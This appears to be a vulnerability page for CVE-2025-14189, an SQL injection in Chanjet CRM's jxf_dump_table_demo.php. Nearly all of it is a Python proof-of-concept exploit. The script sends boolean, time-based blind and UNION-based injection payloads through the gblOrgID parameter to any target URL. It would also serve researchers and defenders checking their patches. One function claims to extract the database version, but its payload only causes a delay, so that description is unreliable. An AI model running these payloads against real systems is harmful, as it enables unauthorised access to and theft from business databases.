CVE-2025-14189 畅捷CRM /tools/jxf_dump_table_demo.php SQL注入漏洞

import requests import sys # CVE-2025-14189 SQL Injection PoC for Chanjet CRM # Target: /tools/jxf_dump_table_demo.php # Vulnerable Parameter: gblOrgID def exploit_sqli(target_url, payload): """ Exploit SQL injection vulnerability in Chanjet CRM target_url: Base URL of the vulnerable application payload: SQL injection payload for gblOrgID parameter """ target = f"{target_url}/tools/jxf_dump_table_demo.php" params = { 'gblOrgID': payload } try: response = requests.get(target, params=params, timeout=10) return response.text except requests.exceptions.RequestException as e: print(f"[!] Request failed: {e}") return None # Blind SQL Injection to extract database version def extract_db_version(target_url): """ Use time-based blind SQL injection to extract database version """ payload = "1' AND (SELECT CASE WHEN (1=1) THEN SLEEP(5) ELSE 0 END) AND '1'='1" print(f"[*] Sending payload to extract database info...") result = exploit_sqli(target_url, payload) return result # Example: Extract current user def extract_current_user(target_url): """ Extract current database user using UNION-based injection """ payload = "1' UNION SELECT user(),2,3,4,5-- -" result = exploit_sqli(target_url, payload) return result if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-14189.py <target_url>") print("Example: python cve-2025-14189.py http://target.com") sys.exit(1) target_url = sys.argv[1] print(f"[*] Target: {target_url}") print(f"[*] Exploiting CVE-2025-14189...") # Test for vulnerability test_payload = "1' OR '1'='1" result = exploit_sqli(target_url, test_payload) if result: print("[+] Target appears to be vulnerable!") else: print("[-] Target may not be vulnerable or is unreachable")